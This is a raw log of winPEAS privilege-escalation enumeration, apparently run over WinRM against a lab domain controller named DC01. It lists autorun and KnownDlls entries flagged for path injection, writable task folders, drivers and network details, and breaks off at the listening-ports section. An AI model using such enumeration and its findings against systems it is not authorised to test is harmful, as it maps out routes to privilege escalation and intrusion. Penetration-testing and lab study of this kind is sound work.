WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: _wowarmhw
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wowarmhw.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: _xtajit
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: xtajit.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: _xtajit64
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: xtajit64.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: advapi32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: advapi32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: clbcatq
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: clbcatq.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: combase
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: combase.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: COMDLG32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: COMDLG32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: coml2
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: coml2.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: DifxApi
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: difxapi.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: gdi32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: gdi32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: gdiplus
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: gdiplus.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: IMAGEHLP
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: IMAGEHLP.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: IMM32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: IMM32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: MSCTF
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: MSCTF.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: MSVCRT
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: MSVCRT.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: NORMALIZ
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: NORMALIZ.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: NSI
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: NSI.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: ole32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: ole32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: OLEAUT32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: OLEAUT32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: PSAPI
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: PSAPI.DLL
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: rpcrt4
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: rpcrt4.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: sechost
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: sechost.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: Setupapi
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: Setupapi.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: SHCORE
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: SHCORE.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: SHELL32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: SHELL32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: SHLWAPI
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: SHLWAPI.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: user32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: user32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: WLDAP32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: WLDAP32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: wow64
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wow64.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: wow64base
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wow64base.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: wow64con
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wow64con.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: wow64win
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wow64win.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: WS2_32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: WS2_32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: \
WINRM       172.16.55.128   5985   DC01                 FolderPerms: Users [Allow: AppendData/CreateDirectories]                                                                                                
WINRM       172.16.55.128   5985   DC01                 File: /UserInstall
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}                                               
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\system32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\system32\unregmp2.exe /FirstLogon
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}                                               
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: U
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}                                               
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\ie4uinit.exe -UserConfig
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}                                               
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install                                                                         
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}                                               
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\Installer                                                                      
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\Installer\setup.exe --configure-user-settings --verbose-logging --system-level --msedge --channel=stable (Unquoted and Space detected) - C:\
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}                                               
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\rundll32.exe C:\Windows\System32\iesetup.dll,IEHardenAdmin                                                                    
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{A509B1A8-37EF-4b3f-8CFC-4F3A74704073}                                               
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\rundll32.exe C:\Windows\System32\iesetup.dll,IEHardenUser                                                                     
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}                                   
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\system32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\system32\unregmp2.exe /FirstLogon
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}                                   
WINRM       172.16.55.128   5985   DC01                 Key: StubPath
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\SysWOW64
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install                                                                         
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}                          
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\BHO                                                                            
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\BHO\ie_to_edge_bho_64.dll (Unquoted and Space detected) - C:\                    
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}              
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\BHO                                                                            
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files (x86)\Microsoft\Edge\Application\146.0.3856.109\BHO\ie_to_edge_bho_64.dll (Unquoted and Space detected) - C:\                    
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup                                                                                    
WINRM       172.16.55.128   5985   DC01                 File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini                                                                          
WINRM       172.16.55.128   5985   DC01                 Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Folder: C:\windows\tasks
WINRM       172.16.55.128   5985   DC01                 FolderPerms: Authenticated Users [Allow: WriteData/CreateFiles]                                                                                         
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Folder: C:\windows\system32\tasks
WINRM       172.16.55.128   5985   DC01                 FolderPerms: Authenticated Users [Allow: WriteData/CreateFiles]                                                                                         
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Folder: C:\windows
WINRM       172.16.55.128   5985   DC01                 File: C:\windows\system.ini
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Folder: C:\windows
WINRM       172.16.55.128   5985   DC01                 File: C:\windows\win.ini
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Scheduled Applications --Non Microsoft--                                                                                                       
WINRM       172.16.55.128   5985   DC01             È Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html                                                                       
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Device Drivers --Non Microsoft--
WINRM       172.16.55.128   5985   DC01             È Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#drivers                                                                                               
WINRM       172.16.55.128   5985   DC01                 VMware vSockets Service - 9.8.19.0 build-18956547 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys                                  
WINRM       172.16.55.128   5985   DC01                 VMware Raw Disk Helper Driver - 1.1.7.0 build-18933738 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmrawdsk.sys                          
WINRM       172.16.55.128   5985   DC01                 VMware Pointing PS/2 Device Driver - 12.5.12.0 build-18967789 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys                    
WINRM       172.16.55.128   5985   DC01                 Intel(R) PRO/1000 Adapter - 8.4.13.0 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\E1G6032E.sys                                       
WINRM       172.16.55.128   5985   DC01                 VMware server memory controller - 7.5.7.0 build-18933738 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Network Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Network Shares
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerate Network Mapped Drives (WMI)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Host File
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Network Ifaces and known hosts
WINRM       172.16.55.128   5985   DC01             È The masks are only for the IPv4 addresses 
WINRM       172.16.55.128   5985   DC01                 Ethernet[08:00:27:2F:A0:3B]: 172.16.55.128, fe80::c833:192d:dba0:737%4 / 255.255.252.0                                                                  
WINRM       172.16.55.128   5985   DC01                     Gateways: 172.16.52.1
WINRM       172.16.55.128   5985   DC01                     DNSs: 114.114.114.114, 114.114.115.115
WINRM       172.16.55.128   5985   DC01                     Known hosts:
WINRM       172.16.55.128   5985   DC01                       10.0.2.2              00-00-00-00-00-00     Invalid                                                                                               
WINRM       172.16.55.128   5985   DC01                       169.254.169.254       00-00-00-00-00-00     Invalid                                                                                               
WINRM       172.16.55.128   5985   DC01                       172.16.52.1           00-74-9C-E6-DF-52     Dynamic                                                                                               
WINRM       172.16.55.128   5985   DC01                       172.16.55.128          00-00-00-00-00-00     Invalid                                                                                               
WINRM       172.16.55.128   5985   DC01                       172.16.55.193         00-0C-29-3D-0E-6F     Dynamic                                                                                               
WINRM       172.16.55.128   5985   DC01                       172.16.55.255         FF-FF-FF-FF-FF-FF     Static                                                                                                
WINRM       172.16.55.128   5985   DC01                       224.0.0.22            01-00-5E-00-00-16     Static                                                                                                
WINRM       172.16.55.128   5985   DC01                       224.0.0.251           01-00-5E-00-00-FB     Static                                                                                                
WINRM       172.16.55.128   5985   DC01                       224.0.0.252           01-00-5E-00-00-FC     Static                                                                                                
WINRM       172.16.55.128   5985   DC01                       255.255.255.255       FF-FF-FF-FF-FF-FF     Static                                                                                                
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0                                                                                               
WINRM       172.16.55.128   5985   DC01                     DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
WINRM       172.16.55.128   5985   DC01                     Known hosts:
WINRM       172.16.55.128   5985   DC01                       224.0.0.22            00-00-00-00-00-00     Static                                                                                                
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current TCP Listening Ports
WINRM       172.16.55.128   5985   DC01             È Check for services restricted from the outside 
WINRM       172.16.55.128   5985   DC01               Enumerating IPv4 connections
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name                       
WINRM       172.16.55.128   5985   DC01             
